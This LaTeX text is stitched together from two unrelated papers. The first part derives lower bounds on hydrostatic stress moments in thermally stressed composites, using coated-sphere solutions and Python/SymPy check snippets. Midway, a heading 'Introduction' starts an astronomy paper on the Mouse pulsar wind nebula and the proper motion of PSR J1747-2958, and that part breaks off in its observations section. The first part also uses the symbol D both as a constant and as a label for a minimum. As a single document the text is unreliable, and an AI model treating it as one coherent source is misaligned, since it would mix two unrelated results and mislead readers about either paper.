We point out that equality holds in \eqref{vecbound2} if and only if $\mathbb{P}^H\sigma$ is identically constant inside the $i^{th}$ material.
In what follows we outline the method for obtaining bounds on the moments in material two noting that the identical procedure delivers bounds on the moments in material one. We introduce the indicator function of material one $\chi_1$ taking the value 1 in material one and zero outside. The indicator function corresponding to material two is denoted by $\chi_2$ and $\chi_2=1-\chi_1$.
To proceed we rewrite the right hand side of \eqref{vecbound2} in terms of the effective elastic properties and thermal expansion coefficient.
To do this we use the following identity given by
\begin{align}\label{5.1}
tr\langle\chi_2\sigma\rangle=\frac{3k_2}{k_2-k_1}\left(\sigma_0-k_1\sigma_0(C^e)^{-1}I:I+k_1\Delta T (C^e)^{-1}H^e:I+k_1\Delta T\langle\lambda\rangle:I\right).
\end{align}
\par
This identity is obtained in the following way.
Taking averages on both sides of \eqref{constitutive} gives $\langle\sigma\rangle=\langle C(x)(\epsilon (\textbf{u}(x))-\Delta T\lambda(x))\rangle$. On writing $C(\textbf{x})=C_1+(C_2-C_1)\chi_2(\textbf{x})$ we see that
\begin{align}\label{5.2}
\langle\sigma\rangle=C_1(\bar{\epsilon}-\Delta T\langle\lambda\rangle)+(C_2-C_1)C_2^{-1}\langle\chi_2\sigma\rangle.
\end{align}
From \eqref{effelast} we see that $\bar{\epsilon}=(C^e)^{-1}(\langle\sigma\rangle-\Delta T H^e)$ and for $\langle\sigma\rangle=\sigma_0 I$ we obtain
\begin{align}\label{5.3}
\langle\chi_2\sigma\rangle=C_2(C_2-C_1)^{-1}(\sigma_0I-C_1((C^e)^{-1}\sigma_0 I-\Delta T (C^e)^{-1}H^e-\Delta T\langle\lambda\rangle)).
\end{align}
The identity (\ref{5.1}) now follows by applying the hydrostatic projection $\mathbb{P}^H$ to both sides of (\ref{5.3}).
\par
We now derive the lower bound. Applying the basic bound \eqref{vecbound2} to
$\langle|\mathbb{P}^H\sigma|^p\rangle_2$ together with (\ref{5.1}) gives
\begin{eqnarray}
&&\langle|\mathbb{P}^H\sigma|^p\rangle_2\nonumber\\
&&\geq |\langle\mathbb{P}^H\sigma \rangle_2|^p=\left|\frac{tr\langle\chi_2\sigma\rangle}{\sqrt{3}\theta_2}\right|^p\nonumber\\
&&=3^{p/2}\theta_2^{-p}\left|\frac{k_2}{k_2-k_1}\right|^p\left|k_1\sigma_0\left(\frac{1}{k_1}-(C^e)^{-1}I:I\right)+k_1\Delta T(C^e)^{-1}H^e:I+k_1\Delta T \langle\lambda\rangle:I\right|^p.\label{5.4}
\end{eqnarray}
We note that equality holds in (\ref{5.4}) when $\mathbb{P}^H\sigma$ is constant inside material two.
We now employ an exact relation that relates the contraction $(C^e)^{-1}H^e:I$ involving the effective thermal stress tensor $H^e$ to the quantity $(C^e)^{-1}I:I$. The exact relation used here is given by
\begin{eqnarray}
(C^e)^{-1}H^e:I&=&\frac{3(h_2-h_1)(C^e)^{-1}I:I+3(\frac{h_1}{k_2}-\frac{h_2}{k_1})}{\frac{1}{k_1}-\frac{1}{k_2}}.
\label{exact}
\end{eqnarray}
This exact relation is a direct consequence of the exact relation developed in \cite{HashinRosen} for the effective thermal expansion tensor $\mathbf{\alpha}^e=-(C^e)^{-1}H^e$.
Substitution of \eqref{exact} into \eqref{5.4} and algebraic manipulation gives
\begin{eqnarray}
\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}\left|(\sigma_0-D)X+ D\right|,
\label{finalbd}
\end{eqnarray}
where
\begin{eqnarray}
X=\frac{\theta_2^{-1}}{k_1^{-1}-k_2^{-1}}\left(\frac{1}{k_1}-(C^e)^{-1}I:I\right).
\label{x}
\end{eqnarray}
As before we point out that equality holds in (\ref{finalbd}) when $\mathbb{P}^H\sigma$ is identically constant inside material two.
Identical arguments deliver the lower bound on the moments over material one given by
\begin{eqnarray}
\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq \sqrt{3}\left|(\sigma_0-D)Y+ D\right|,
\label{finalbd2}
\end{eqnarray}
where
\begin{eqnarray}
Y=\frac{\theta_1^{-1}}{k_2^{-1}-k_1^{-1}}\left(\frac{1}{k_2}-(C^e)^{-1}I:I\right),
\label{y}
\end{eqnarray}
and \eqref{finalbd2} holds with equality when $\mathbb{P}^H\sigma$ is a constant in material one.
The variables $X$ and $Y$ are constrained to lie within intervals set by bounds on the contraction
$(C^e)^{-1}I:I$. These bounds follow immediately from the work of Kantor and Bergman \cite{KB} and are given by
\begin{eqnarray}
(K_{HS}^+)^{-1}\leq (C^e)^{-1}I:I \leq (K_{HS}^-)^{-1},
\label{HS}
\end{eqnarray}
where $K_{HS}^-$ and $K_{HS}^+$ are the Hashin and Shtrikman bulk modulus bounds \cite{hashin} given by
\begin{eqnarray}
K_{HS}^+=k_1\theta_1+k_2\theta_2-(\frac{\theta_1\theta_2(k_2-k_1)^2}{k_1\theta_2+k_2\theta_1+\frac{4}{3}\mu_1})
\label{hs+}
\end{eqnarray}
and
\begin{eqnarray} K_{HS}^-=k_1\theta_1+k_2\theta_2-(\frac{\theta_1\theta_2(k_2-k_1)^2}{k_1\theta_2+k_2\theta_1+\frac{4}{3}\mu_2}).
\label{hs-}
\end{eqnarray}
These bounds hold both for elastically well-ordered materials and elastically non well-ordered materials.
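As a quick numerical sanity check of \eqref{hs+} and \eqref{hs-}, the Python sketch below (with arbitrarily chosen illustrative moduli, not values from the text) verifies that the two Hashin--Shtrikman values are ordered and that both lie between the Reuss (harmonic) and Voigt (arithmetic) mixture bounds:

```python
# Hashin-Shtrikman bulk modulus bounds; the moduli below are illustrative only.
def K_HS(k1, k2, mu, th1, th2):
    return k1*th1 + k2*th2 - th1*th2*(k2 - k1)**2/(k1*th2 + k2*th1 + 4*mu/3)

k1, k2 = 10.0, 4.0      # bulk moduli with k1 > k2 (well-ordered when mu1 > mu2)
mu1, mu2 = 6.0, 2.0     # shear moduli
th2 = 0.3
th1 = 1.0 - th2
K_plus = K_HS(k1, k2, mu1, th1, th2)   # uses the stiffer shear modulus mu1
K_minus = K_HS(k1, k2, mu2, th1, th2)  # uses the softer shear modulus mu2

K_reuss = 1.0/(th1/k1 + th2/k2)        # harmonic mean
K_voigt = th1*k1 + th2*k2              # arithmetic mean
assert K_reuss <= K_minus <= K_plus <= K_voigt
print(round(K_minus, 3), round(K_plus, 3))  # → 7.307 7.652
```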
When the materials are well--ordered, \eqref{HS} implies that $X$ and $Y$ lie in the intervals
\begin{eqnarray}
L_2\leq & X&\leq M_2,\label{intervalwell1}\\
L_1\leq & Y& \leq M_1,
\label{intervalwell2}
\end{eqnarray}
while for non well--ordered materials
\begin{eqnarray}
M_2\leq & X&\leq L_2,\label{intervalnonwell1}\\
M_1\leq & Y& \leq L_1.
\label{intervalnonwell2}
\end{eqnarray}
A straightforward calculation in Section \ref{Newsolutions} shows that the hydrostatic component of the local stress is constant inside each phase of the coated sphere construction. Hence \eqref{finalbd} and \eqref{finalbd2} hold with equality for the coated spheres construction and we obtain explicit formulas for the moments of the hydrostatic component of the local stresses for these composites. For coated spheres with core phase 1 and coating phase 2, $(C^e)^{-1}I:I=(K_{HS}^-)^{-1}$ and
substitution of \eqref{hs-} into \eqref{x} and \eqref{y} together with \eqref{finalbd} and \eqref{finalbd2} shows that the moments are given by
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}=\sqrt{3}\left|(\sigma_0-D)M_2+ D\right|,\hbox{ and}
\label{finalbdhs+}\\
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}= \sqrt{3}\left|(\sigma_0-D)L_1+ D\right|.
\label{finalbd2hs+}
\end{eqnarray}
For coated spheres with core phase 2 and coating phase 1, $(C^e)^{-1}I:I=(K_{HS}^+)^{-1}$ and
substitution of \eqref{hs+} into \eqref{x} and \eqref{y} together with \eqref{finalbd} and \eqref{finalbd2} shows that the moments are given by
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}=\sqrt{3}\left|(\sigma_0-D)L_2+ D\right|,\hbox{ and}
\label{finalbdhs-}\\
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}= \sqrt{3}\left|(\sigma_0-D)M_1+ D\right|.
\label{finalbd2hs-}
\end{eqnarray}
We now collect these results, state the lower bounds, and indicate when they are optimal.
\begin{theorem}{\rm Bounds for well-ordered composites, $k_1>k_2$.}
\label{optlowerboundswell}
For $1< p \leq\infty$, any choice of $\Delta T$, and $-\infty<\sigma_0<\infty$ the lower bounds are given by the following formulas.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}\geq \min_{L_2\leq X\leq M_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},
\label{finalbdmin2well}
\end{eqnarray}
and when the minimum is realized for $X=L_2$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 2 and coating 1; when the minimum is realized for $X=M_2$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 1 and coating 2.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}\geq \min_{L_1\leq Y\leq M_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\},
\label{finalbdmin1well}
\end{eqnarray}
and when the minimum is realized for $Y=L_1$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 1 and coating 2; when the minimum is realized for $Y=M_1$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 2 and coating 1.
\end{theorem}
\begin{theorem}{\rm Bounds for non well-ordered composites, $k_2>k_1$.}
\label{optlowerboundsnonwell}
For $1< p \leq\infty$, any choice of $\Delta T$, and $-\infty<\sigma_0<\infty$ the lower bounds are given by the following formulas.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}\geq \min_{M_2\leq X\leq L_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},
\label{finalbdmin2nonwell}
\end{eqnarray}
and when the minimum is realized for $X=L_2$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 2 and coating 1; when the minimum is realized for $X=M_2$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 1 and coating 2.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}\geq \min_{M_1\leq Y\leq L_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\},
\label{finalbdmin1nonwell}
\end{eqnarray}
and when the minimum is realized for $Y=L_1$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 1 and coating 2; when the minimum is realized for $Y=M_1$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 2 and coating 1.
\end{theorem}
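Since the quantity minimized in both theorems is $\sqrt{3}\,|(\sigma_0-D)X+D|$, the absolute value of an affine function of $X$ (or $Y$), the minimum over an interval is either zero (when the root of the affine function lies inside the interval) or is attained at an endpoint. A minimal sketch of this evaluation (function name ours):

```python
import math

def min_abs_affine(sigma0, D, lo, hi):
    """min over X in [lo, hi] of sqrt(3)*|(sigma0 - D)*X + D|,
    the minimand appearing in both theorems."""
    f = lambda X: math.sqrt(3)*abs((sigma0 - D)*X + D)
    if sigma0 != D:
        root = -D/(sigma0 - D)
        if lo <= root <= hi:    # root of the affine function lies in the interval
            return 0.0
    return min(f(lo), f(hi))    # otherwise an endpoint is the minimizer

print(min_abs_affine(2.0, 1.0, 0.0, 1.0))   # root at X=-1 is outside: min at X=0, i.e. sqrt(3)
print(min_abs_affine(0.0, 1.0, 0.0, 2.0))   # root at X=1 is inside the interval → 0.0
```

This is why the tables in Sections 3 and 4 split into cases according to the sign of $(\sigma_0-D)$ and the position of the root relative to the interval endpoints.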
These bounds are stated explicitly in the first four tables of Sections 3 and 4.
We conclude by outlining the steps behind the derivation of the lower bounds on the maximum values of the local fields inside thermally stressed composites. For the well--ordered case we use the simple lower bound given by
\begin{eqnarray}
\max_{\textbf{x}\hbox{ \tiny in $Q$}}\left\{|\mathbb{P}_H\sigma(\textbf{x})|\right\}\geq\max\left\{A,B\right\},
\label{linftyab}
\end{eqnarray}
where
\begin{eqnarray}
A&=&\min_{L_2\leq X\leq M_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},\nonumber\\
B&=&\min_{L_1\leq Y\leq M_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\}.
\label{ab}
\end{eqnarray}
For the non well--ordered case we use
\begin{eqnarray}
\max_{\textbf{x}\hbox{ \tiny in $Q$}}\left\{|\mathbb{P}_H\sigma(\textbf{x})|\right\}\geq\max\left\{C,D\right\},
\label{linftycd}
\end{eqnarray}
where
\begin{eqnarray}
C&=&\min_{M_2\leq X\leq L_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},\nonumber\\
D&=&\min_{M_1\leq Y\leq L_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\}.
\label{cd}
\end{eqnarray}
The bounds given in the last two tables presented in Sections 3 and 4 follow from straightforward but tedious calculation of the explicit formulas corresponding to \eqref{linftyab} and \eqref{linftycd}.
A delicate but straightforward computation shows that these lower bounds are attained by the fields inside the coated sphere assemblage.
\bigskip
\bigskip
\section{Local stress and strain fields inside thermally stressed coated sphere geometries}
\label{Newsolutions}
In this section we summarize the properties of local fields inside the coated sphere assemblage in the presence of thermal stress due to a mismatch in the coefficients of thermal expansion. From linearity the local stress can be split into the sum of two components: one arising from imposed mechanical stress and a second associated with thermal stress. It is known that the local stress due to an imposed hydrostatic stress has a constant hydrostatic part inside each phase; this follows from the explicit solution, see for example \cite{Milton}.
Here we display the explicit solution for the local stress due to mismatch in the coefficients of thermal expansion and show that it has a constant hydrostatic component inside each phase. From this we conclude that the total local stress inside the coated sphere assemblage has a constant hydrostatic component inside each phase.
We solve for the stress inside a prototypical coated sphere composed of a spherical core of material two with radius $a$, surrounded by a concentric shell of material one with an outer radius $b$. The ratio $(a/b)^3$ is fixed and equal to the inclusion volume fraction $\theta_2$. Here the coefficients of thermal expansion for the core and coating are given by $h_2$ and $h_1$, respectively. The local elastic displacement $\tilde{\varphi}$ satisfies the equations of elastic equilibrium given by:
\begin{displaymath}
\left\{\begin{array}{ll} div(C_2(\epsilon (\tilde{\varphi})-h_2I))=0 & 0<r<a ,\\
div(C_1(\epsilon (\tilde{\varphi})-h_1I))=0 & a<r<b,\\
C_1(\epsilon (\tilde{\varphi})-h_1I) \textbf{n}|_1=C_2(\epsilon (\tilde{\varphi})-h_2I)\textbf{n}|_2 & \text{continuity of traction at } r=a,\\
\tilde{\varphi} \quad\text{is continuous}& \text{on $0<r<b$},\\
\tilde{\varphi}=0 &\text{on the boundary $r=b$}.\end{array}\right.
\end{displaymath}
\par
We assume a general form of the solution given by
\begin{equation*}
\tilde{\varphi} =
\begin{cases}
C\textbf{r} & 0<r<a,\\
A\textbf{r}+B\frac{\textbf{n}}{r^2} & a<r<b,\\
0 & r\geq b,
\end{cases}
\end{equation*}
where $r=|\textbf{r}|, \textbf{n}=\textbf{r}/r$ and $A, B, C$ are unknowns. The corresponding strain field $\epsilon(\tilde{\varphi})$ is given by
\begin{equation}
(\epsilon (\tilde{\varphi}))_{ij} =\frac{1}{2}(\tilde{\varphi}_{i,j}+\tilde{\varphi}_{j,i})=
\begin{cases}
C\delta_{ij} & 0<r<a,\\
A\delta_{ij}+\frac{B}{r^3}(\delta_{ij}-3n_in_j) & a<r<b,\\
0 & r\geq b.
\end{cases}
\label{hydroconst}
\end{equation}
On applying the continuity of displacement and the traction at the interface we find that
$$A=\frac{3\theta_2(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)} , $$
$$B=\frac{-3a^3(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)} , $$
$$C=\frac{-3(1-\theta_2)(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)}.$$
\\
\par
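The interface and boundary conditions reduce to three linear equations for $A$, $B$ and $C$. As a check, the SymPy sketch below solves them and recovers the formulas above; it uses the fact that for an isotropic phase with the assumed displacement $u=A'r+B'/r^2$ the radial stress is $\sigma_{rr}=3kA'-4\mu B'/r^{3}-3kh$, and it also verifies the expression for $H^\ast$ appearing in \eqref{2.3} below.

```python
import sympy as sp

k1, k2, mu1, h1, h2, a, b, r = sp.symbols('k1 k2 mu1 h1 h2 a b r', positive=True)
A, B, C = sp.symbols('A B C')          # displacement coefficients, as in the text
theta2 = a**3/b**3                     # core volume fraction

# Radial stress sigma_rr for displacement u = Ac*r + Bc/r^2 in an isotropic
# phase with bulk modulus k, shear modulus mu and thermal coefficient h:
# tr(eps) = 3*Ac, and the deviatoric radial strain contributes -4*mu*Bc/r^3.
def sigma_rr(k, mu, h, Ac, Bc):
    return 3*k*Ac - 4*mu*Bc/r**3 - 3*k*h

eqs = [
    sp.Eq(C*a, A*a + B/a**2),                        # displacement continuity at r = a
    sp.Eq(sigma_rr(k2, 0, h2, C, 0),
          sigma_rr(k1, mu1, h1, A, B).subs(r, a)),   # traction continuity at r = a
    sp.Eq(A*b + B/b**2, 0),                          # displacement vanishes at r = b
]
sol = sp.solve(eqs, [A, B, C], dict=True)[0]

den = 3*k1*theta2 + 4*mu1 + 3*k2*(1 - theta2)
assert sp.simplify(sol[A] - 3*theta2*(k1*h1 - k2*h2)/den) == 0
assert sp.simplify(sol[B] + 3*a**3*(k1*h1 - k2*h2)/den) == 0
assert sp.simplify(sol[C] + 3*(1 - theta2)*(k1*h1 - k2*h2)/den) == 0

# Radial stress at the outer boundary r = b gives the effective thermal stress H*.
Hstar = sp.simplify(sigma_rr(k1, mu1, h1, A, B).subs(sol).subs(r, b))
assert sp.simplify(Hstar - (3*theta2*(3*k1 + 4*mu1)*(k1*h1 - k2*h2)/den - 3*k1*h1)) == 0
```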
Computation of the radial component of the stress at $r=b$ gives
\begin{eqnarray}
C_1(\epsilon(\tilde{\varphi})-h_1I) \textbf{n}=H^\ast\textbf{n}
\label{normal}
\end{eqnarray}
where $H^\ast$ is given by
\begin{align}\label{2.3}
H^\ast=\frac{3\theta_2(3k_1+4\mu_1)(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)}I-3k_1h_1I.
\end{align}
\\
\par
In this way we have constructed a solution $\tilde{\varphi}$ for the elastic field inside every coated sphere in the assemblage.
We now define $\varphi^p$ on the whole domain $Q$ to be given by $\tilde{\varphi}$ inside each coated sphere and zero outside. It easily follows on integrating by parts using
\eqref{normal} together with the fact that $\varphi^p$ vanishes on the boundary of each coated sphere that $\varphi^p$ is the weak solution \cite{Gilbarg} of $div(C(\epsilon(\varphi^p)-\lambda))=0$ over the full domain $Q$, i.e., $$\langle C(\epsilon (\varphi^p)-\lambda):\epsilon(\phi)\rangle=0$$ for every periodic test function $\phi$.
Equation \eqref{hydroconst} implies that the hydrostatic component of the stress is constant inside each phase.
Last we show that the effective thermal stress $H^e$ for the coated sphere assemblage is given by $H^\ast$. Inside each coated sphere $S_i$, $i=1,2,\ldots$ we consider $\sigma=C(\epsilon (\varphi^p)-\lambda)$ and integrate by parts and apply \eqref{normal} to find that
\begin{eqnarray}
\int_{S_i}\sigma d\textbf{x}&=&\int_{\partial S_i}(\sigma\textbf{n})\otimes\textbf{x} ds\nonumber\\
&=&\int_{\partial S_i}(H^\ast\textbf{n})\otimes\textbf{x} ds=|S_i|H^\ast
\label{intbyparts}
\end{eqnarray}
where $ds$ is an element of surface area on the outer surface of the coated sphere $\partial S_i$
and $|S_i|$ is the volume of $S_i$.
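The step from $(\sigma\textbf{n})\otimes\textbf{x}$ to $|S_i|H^\ast$ rests on the identity $\int_{\partial S}\textbf{n}\otimes\textbf{x}\,ds=|S|\,I$ on a sphere. A quick Monte Carlo check of this identity on the unit sphere (where $\textbf{x}=\textbf{n}$ on the boundary):

```python
import numpy as np

# On the unit sphere, x = n on the boundary, so the claim is
# area * <n ⊗ n> = (4*pi/3) * I = |S| * I.
rng = np.random.default_rng(0)
v = rng.normal(size=(200_000, 3))
n = v/np.linalg.norm(v, axis=1, keepdims=True)        # uniform directions on the sphere
integral = 4*np.pi*np.einsum('ki,kj->ij', n, n)/len(n)
assert np.allclose(integral, (4*np.pi/3)*np.eye(3), atol=0.05)
print(np.round(integral, 2))    # ≈ (4*pi/3) on the diagonal, ≈ 0 off-diagonal
```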
Substitution of \eqref{intbyparts} into \eqref{effectethstress}
gives the required identity
\begin{eqnarray}
H^e=\langle\sigma\rangle=\sum_{i=1}^\infty \int_{S_i}\sigma d\textbf{x}=H^\ast.
\label{intbypartsandidentity}
\end{eqnarray}
\section{Introduction}\label{SectionIntroduction}
The evolution of neutron stars and the potential relationships between some of their observed classes remain outstanding problems in
astrophysics. Proper motion studies of neutron stars can provide independent age estimates with which to shed light on these questions.
In particular, the well defined geometry of bow shock pulsar wind nebulae (PWNe; \citeauthor{gaensler:3} \citeyear{gaensler:3}),
where the relativistic wind from a high-velocity pulsar is confined by ram pressure, can be used as a probe to aid in the understanding
of both neutron star evolution and the properties of the local medium through which these stars travel.
The ``Mouse'' (PWN~G359.23$-$0.82), a non-thermal radio nebula, was discovered as part of a radio continuum survey of the
Galactic center region \citep{yusef}, and was suggested to be powered by a young pulsar following X-ray detection \citep{predehl}.
It is now recognized as a bow shock PWN moving supersonically through the interstellar medium (ISM; \citeauthor{gaensler:5} \citeyear{gaensler:5}).
Its axially symmetric morphology, shown in Figure \ref{fig:yusef20cm}, consists of a compact ``head'', a fainter ``body'' extending
for $\sim$10$^\prime$$^\prime$, and a long ``tail'' that extends westward behind the Mouse for $\sim$40$^\prime$$^\prime$
and $\sim$12$^\prime$ at X-ray and radio wavelengths respectively \citep{gaensler:5,mori}. The cometary tail appears to indicate
motion away from a nearby supernova remnant (SNR), G359.1$-$0.5 \citep{yusef}.
\begin{figure*}[t]
\setlength{\abovecaptionskip}{-7pt}
\begin{center}
\includegraphics[trim = 0mm 0mm 0mm 0mm, clip, angle=-90, width=13cm]{f1.ps}
\end{center}
\caption{VLA image of the Mouse (PWN~G359.23$-$0.82) at 1.4~GHz with a resolution of 12\farcs8$\times$8\farcs4 (reproduced from
\citeauthor{gaensler:5} \citeyear{gaensler:5}). The brightness scale is logarithmic, ranging between $-$2.0
and $+$87.6~mJy~beam$^{-1}$ as indicated by the scale bar to the right of the image. The eastern rim of SNR~G359.1$-$0.5 is faintly visible west
of $\sim$RA~17$^{\mbox{\scriptsize{h}}}$46$^{\mbox{\scriptsize{m}}}$25$^{\mbox{\scriptsize{s}}}$.}
\label{fig:yusef20cm}
\end{figure*}
A radio pulsar, J1747$-$2958, has been discovered within the ``head'' of the Mouse \citep{camilo:1}. PSR~J1747$-$2958 has a spin
period $P=98.8$ ms and period derivative $\dot{P}=6.1\times10^{-14}$, implying a spin-down luminosity
$\dot{E}=2.5 \times 10^{36}$~ergs~s$^{-1}$, surface dipole magnetic field strength $B=2.5\times10^{12}$~G, and characteristic age
$\tau_{c} \equiv P/ 2\dot{P}=25$~kyr (\citeauthor{camilo:1} \citeyear{camilo:1}; see also updated timing data from
\citeauthor{gaensler:5} \citeyear{gaensler:5}). The distance to the pulsar is {\footnotesize $\gtrsim$}4~kpc from X-ray
absorption \citep{gaensler:5}, and {\footnotesize $\lesssim$}5.5 kpc~from HI absorption \citep{uchida}. Here we assume that
the system lies at a distance of $d=5d_{5}$~kpc, where $d_{5}=1\pm0.2$ ($1\sigma$).
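The derived quantities quoted above follow from the standard spin-down relations $\tau_c=P/2\dot P$, $\dot E=4\pi^2I\dot P/P^3$ (with the fiducial neutron-star moment of inertia $I=10^{45}$~g~cm$^2$, an assumption not stated in the text), and $B=3.2\times10^{19}\sqrt{P\dot P}$~G; a quick check:

```python
import math

P, Pdot = 0.0988, 6.1e-14      # spin period (s) and period derivative
I = 1e45                       # g cm^2, fiducial moment of inertia (assumption)
yr = 3.156e7                   # seconds per year

tau_c = P/(2*Pdot)/yr/1e3                  # characteristic age in kyr
Edot = 4*math.pi**2*I*Pdot/P**3            # spin-down luminosity in erg/s
B = 3.2e19*math.sqrt(P*Pdot)               # surface dipole field in G

print(round(tau_c, 1), f"{Edot:.1e}", f"{B:.1e}")  # → 25.7 2.5e+36 2.5e+12
```

The small difference between the computed $\tau_c\approx25.7$~kyr and the quoted 25~kyr reflects rounding of $P$ and $\dot P$.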
Given such a small characteristic age, it is natural to ask where PSR~J1747$-$2958 was born and to try and find an
associated SNR. While it is possible that no shell-type SNR is visible, such as with the Crab pulsar \citep{sankrit} and other young
pulsars \citep{braun}, an association with the adjacent SNR~G359.1$-$0.5 appears plausible. This remnant was initially suggested to
be an unrelated background object near the Galactic center \citep{uchida}. However, it is now believed that the two may be located at
roughly the same distance (\citeauthor{yusef3} \citeyear{yusef3}, and references therein). By determining a proper motion for
PSR~J1747$-$2958, this association can be subjected to further scrutiny (for example, see analysis of PSR~B1757$-$24,
PWN~G5.27$-$0.90 and SNR~G5.4$-$1.2; \citeauthor{blazek} \citeyear{blazek}; \citeauthor{zeiger} \citeyear{zeiger}).
As PSR~J1747$-$2958 is a very faint radio source, it is difficult to measure its proper motion interferometrically. It is also
difficult to use pulsar timing to measure its proper motion due to
timing noise and its location near the ecliptic plane \citep{camilo:1}. To circumvent these issues, in this paper we investigate
dual-epoch high-resolution radio observations of the Mouse nebula, spanning 12 years from 1993
to 2005, with the intention of indirectly inferring the motion of PSR~J1747$-$2958 through the motion of its bow shock PWN. In
\S~\ref{SectionObservations} we present these observations. In \S~\ref{SectionAnalysis} we present our analysis and measurement
of proper motion using derivative images of PWN~G359.23$-$0.82. In \S~\ref{SectionDiscussion} we use our measurement to determine an
in situ hydrogen number density for the local ISM, to resolve the question of a possible association with SNR~G359.1$-$0.5, and to investigate
the age and possible future evolution of PSR~J1747$-$2958. We summarize our conclusions in \S~\ref{SectionConclusions}.
\section{Observations}\label{SectionObservations}
PWN~G359.23$-$0.82 was observed with the Very Large Array (VLA) on 1993 February 2 (Program AF245) and again\footnote{An observation of
PWN~G359.23$-$0.82 was also carried out on 1999 October 8 (Program AG571). However, the target was observed mainly at low elevation and
the point spread function and spatial frequency coverage were both poor as a result, thus ruling out the observation's amenability to
astrometric comparison.} on 2005 January 22 (Program AG671). Each of these observations were carried out in the hybrid BnA configuration
at a frequency near 8.5 GHz. The 1993 and 2005 epochs used on-source observation times of 3.12 and 2.72 hours respectively. The 1993
observation only measured $RR$ and $LL$ circular polarization products, while the 2005 observation measured the cross terms $RL$ and
$LR$ as well. Both observations used the same pointing center, located at
$\mbox{RA}$~$=$~$17^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec764, $\mbox{Dec}$~$=$~$-29$\degree58$^\prime$1\farcs12 (J2000),
as well as the same primary flux calibrator, 3C286. Both were phase-referenced to the extragalactic source TXS~1741$-$312, located at
$\mbox{RA}$~$=$~$17^{\mbox{\scriptsize{h}}}$44$^{\mbox{\scriptsize{m}}}$23\farcsec59, $\mbox{Dec}$~$=$~$-31$\degree16$^\prime$35\farcs97 (J2000),
which is separated by $1\hbox{$.\!\!^\circ$}4$ from the pointing center.
Data reduction was carried out in near identical fashion for both epochs using the MIRIAD package \citep{sault:2}, taking into
consideration the slightly different correlator mode used in the 1993 data. This process involved editing, calibrating, and
imaging the data using multi-frequency synthesis and square pixels of size 50~$\times$~50 milli-arcseconds. These images were
then deconvolved using a maximum entropy algorithm and smoothed to a common resolution with a circular Gaussian of full width at
half-maximum (FWHM) 0\farcs81. The resulting images are shown in the left column of Figure \ref{fig:allImages}.
\begin{figure*}[t]
\setlength{\abovecaptionskip}{-7pt}
\begin{center}
\includegraphics[trim = 0mm 0mm 0mm 0mm, clip, angle=-90, width=12cm]{f2.ps}
\end{center}
\caption{{\it Left column:} VLA observations of the Mouse at 8.5~GHz over two epochs separated by 12 yr. Each image covers
a 14\farcs5$\times$8\farcs5 field at a resolution of 0\farcs81, as indicated by the circle at the bottom right of each panel. The brightness
scale is linear, ranging between $-$0.23 and $+$3.5~mJy~beam$^{-1}$.
{\it Right column:} Spatial x-derivative images for 1993 (top) and 2005 (bottom), covering the same regions as images in the left column.
The images are shown in absolute value to increase visual contrast using a linear brightness scale spanning zero and the largest magnitude
derivative from either image. The box between $\sim$RA~17$^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec8$-$16\farcsec5 indicates
the eastern region extracted for cross-correlation.
{\it All panels:} Contours are shown over each image at 30\%, 50\%, 75\% and 90\% of the peak flux within their respective column group.
The dashed vertical line in each panel has been arbitrarily placed at a right ascension near the brightness peak in the top-right panel
in order to determine if motion can be seen by eye between epochs.}
\label{fig:allImages}
\end{figure*}
The peak flux densities of the 1993 and 2005 images are 3.24 and 3.25~mJy~beam$^{-1}$, respectively; the noise levels in these two images are
51 and 35~$\mu$Jy~beam$^{-1}$, respectively. The pulsar J1747$-$2958 is located at
$\mbox{RA}$~$=$~$17^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec882,
$\mbox{Dec}$~$=$~$-29$\degree58$^\prime$1\farcs0 (J2000), within the region of intense synchrotron emission seen
in each image (see \S~3.5 of \citeauthor{gaensler:5} \citeyear{gaensler:5}). Qualitatively comparing each epoch from the left column of
Figure \ref{fig:allImages}, it appears that the head of PWN~G359.23$-$0.82 has the same overall shape in both images,
with a quasi-parabolic eastern face, approximate axial symmetry along a horizontal axis through the center of the nebula (although
the position of peak intensity seems to shift slightly in declination), and a small extension to the west. By eye the PWN seems
to be moving from west to east over time, in agreement with expectation from the cometary morphology seen in Figure \ref{fig:yusef20cm}.
Beyond any minor morphological changes seen between the images in the left column of Figure \ref{fig:allImages}, the Mouse nebula seems
to have expanded slightly over time.
